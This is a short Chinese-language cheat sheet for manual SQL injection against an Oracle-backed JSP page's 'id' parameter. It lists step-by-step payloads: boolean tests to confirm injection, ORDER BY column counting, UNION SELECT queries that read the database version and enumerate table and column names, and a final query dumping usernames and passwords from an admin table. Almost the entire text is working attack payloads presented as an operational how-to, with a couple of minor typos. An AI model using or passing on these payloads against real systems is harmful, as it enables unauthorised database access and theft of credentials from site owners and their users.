xx.jsp?id=1 and 1=1
xx.jsp?id=1 and 1=2返回不一样则继续
xx.jsp?id=1;返回错误继续
xx.jsp?id=1--返回正常继续
xx.jsp?id=1/*返回错误
xx.jsp?id=1 and exists(select * from dual)--
满足上面条件就可以确定是oracle注入点了
xx.jsp?id=1 order by x猜出列数
假如列数是3,并且第一个字段是numer型的,第一和第三都是varchar2类型的数据
xx.jsp?id=1 and 1=2 union select null,null,null from daul(根据页面输出数据的地方判断字段类型以便和想要得到想要信息的数据类型匹配)
xx.jsp?id=1 and 1=2 union select null,(select banner from sys.v_$version where rownum=1),null from dual
//查询版本信息
获取表名
xx.jsp?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1),null from dual
//查询数据库中第一个表 假如得到的是NEWS
xx.jsp?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'NEWS'),null from dual
(注意表名'NEWS'要大写)
//查询数据库中第二个表 假如得到的是BOARD
xx.jsp?id=1 and 1=2 union select null,(select table_name from user_tables where rownum=1 and table_name<>'BORAD' and table_name<>'NEWS'),null from dual
//以此类推可以查询出当前用户数据库中的所有表名
获取字段名
xx.jsp?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='ADMIN' and rownum=1),null from dual
//获取admin表中第一个字段,假如返回结果为ID
xx.jsp?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and rownum=1),null from dual
//获取admin 表中第二个字段,假如得到的是USERNAME
xx.jsp?id=1 and 1=2 union select null,(select column_name from user_tab_columns where table_name='ADMIN' and column_name<>'ID' and column_name<>'USERNAME' and rownum=1),null from dual
//以此类推就可以列出目标表的字段
获取字段内容
xx.jsp?id=1 and 1=2 union select null,username,password from admin